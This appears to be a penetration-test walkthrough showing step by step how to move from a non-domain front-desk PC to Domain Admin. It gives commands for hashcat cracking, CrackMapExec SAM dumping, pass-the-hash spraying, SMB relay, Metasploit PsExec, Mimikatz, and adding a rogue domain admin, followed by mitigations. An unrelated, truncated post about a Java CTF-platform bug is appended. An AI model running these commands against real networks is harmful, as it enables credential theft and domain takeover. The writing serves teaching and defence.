hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

hashcat

Now we have a set of credentials for the front desk machine. Hitting the machine again with CME but this time passing the cracked credentials:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

admin on own machine

We can see Pwn3d! in the output showing us this is a local administrator account. This means we have the privileges required to dump the local password hashes:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

SAM hashes

Note we can see

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

This time we are seeing the NTLM hash of the password, rather than the NETNTLMv2 “challenge/response” hash that Responder caught earlier. Responder captures hashes over the wire, and these are in a different format to the hashes Windows stores in the SAM.
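The relationship between the two formats can be sketched in Python. This is a simplified illustration of just the NTLMv2 key-derivation step from MS-NLMP, not a full authentication implementation; the NT hash and account names are the ones from this walkthrough:

```python
import hashlib
import hmac


def ntlmv2_key(nt_hash_hex, user, domain):
    """Derive the NTLMv2 key from a stored NT hash: HMAC-MD5 keyed
    with the NT hash, over the upper-cased username concatenated with
    the domain, both encoded as UTF-16LE."""
    nt_hash = bytes.fromhex(nt_hash_hex)
    identity = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, identity, hashlib.md5).hexdigest()


# NT hash and account details from this walkthrough
key = ntlmv2_key("eb6538aa406cfad09403d3bb1f94785f", "FRONTDESK", "2-FD-87622")
print(key)  # bears no resemblance to the stored NT hash
```

The NETNTLMv2 response Responder captures is then a further HMAC-MD5 over the server challenge and a client blob, keyed with this value, which is why the on-the-wire hash can be cracked but never matches, or substitutes for, the SAM's NT hash.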

The next step was to try the local administrator hash and spray it against the client’s server range. Note that we don’t even have to crack this administrator password, we can simply “pass-the-hash”:

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth

admin password reuse

We can only pass-the-hash using the stored NTLM format, not the NETNTLMv2 network format (unless you look to execute an “SMB relay” attack instead).
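If cracking fails, a captured NETNTLMv2 authentication can instead be relayed live to another host that has SMB signing disabled, for example with Impacket's ntlmrelayx (a sketch only; the target IP is from this lab setup):

```
# Relay incoming NTLM authentication to the target and run a command
ntlmrelayx.py -t smb://172.16.157.134 -smb2support -c whoami
```
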

To our surprise, it got a hit: the local administrator password had been reused on the STEWIE machine. Querying this host’s NetBIOS info:

$ cme smb 172.16.157.134 
SMB         172.16.157.134  445    STEWIE           
[*] Windows Server 2008 R2 Foundation 7600 x64 (name:STEWIE) (domain:MACFARLANE)
(signing:False) (SMBv1:True)

We can see it is a member of the MACFARLANE domain, the main domain of the client’s Active Directory.

So the non-domain machine had a local administrator password which was reused on the internal servers. We can now use Metasploit to PsExec onto the machine, using the NTLM hash as the password, which will cause Metasploit to pass-the-hash.

metasploit options
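The module configuration would look something like the following (a sketch; option names can vary between Metasploit versions, and the values are from this lab):

```
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOSTS 172.16.157.134
msf exploit(psexec) > set SMBUser administrator
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51
msf exploit(psexec) > run
```

Setting SMBPass to the full LM:NT hash pair, rather than a plaintext password, is what makes Metasploit pass-the-hash.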

Once run, our shell is gained:

ps exec shell

We can load the Mimikatz module and read Windows memory to find passwords:

mimikatz

Looks like we have the DA (Domain Admin) account details. And to finish off, we use CME to execute commands on the Domain Controller to add ourselves as a DA (purely as a POC; in real life, or to remain more stealthy, we could just use the discovered account).

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda /add'

add da

Note the use of the undocumented /y switch to suppress the prompt Windows gives you for adding a password longer than 14 characters.

A screenshot of Remote Desktop to the Domain Controller can go into the report as proof of exploitation:

da proof

So if this front desk machine had been joined to the domain, it would have had LLMNR disabled (from their Group Policy setting) and we wouldn’t have gained the initial access to it and leveraged its secrets in order to compromise the whole domain. Of course there are other mitigations such as using LAPS to manage local administrator passwords and setting FilterAdministratorToken to prevent SMB logins using the local RID 500 account (great post on this here).
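For reference, the Group Policy setting “Turn off multicast name resolution”, which the domain-joined machines had received, corresponds to this registry value (a sketch; apply it via GPO rather than per-machine where possible):

```
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f
```
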

✇ Orange

Pwn a CTF Platform with Java JRMP Gadget

By: [email protected] (Orange Tsai)
Tired of playing CTFs and feeling there is nothing new? Try taking down the whole CTF scoreboard instead! A few months ago I happened to see a large CTF open for registration, but it did not allow Taiwan to participate, which was a little sad :( At the bottom of the official site I noticed it was organised by FlappyPig, with the source code attached on GitHub, so in the spirit of practising Java code review I git cloned it and went hunting for bugs! (All the testing below was friendly testing done with FlappyPig's permission, and this post was published with their consent after the vulnerability was reported to them.) When doing a Java code review with source code available, the first step is of course to understand the third-party library dependencies. I shared a little about the Java ecosystem in an article a few years ago: when a low-level library has a problem, every application layered on top of it is affected! Looking at pom.xml, we find Spring Framework 4.2.4, which judging by the version number looks fine with no major known issues, and Mybatis 3.3.1, a Java ORM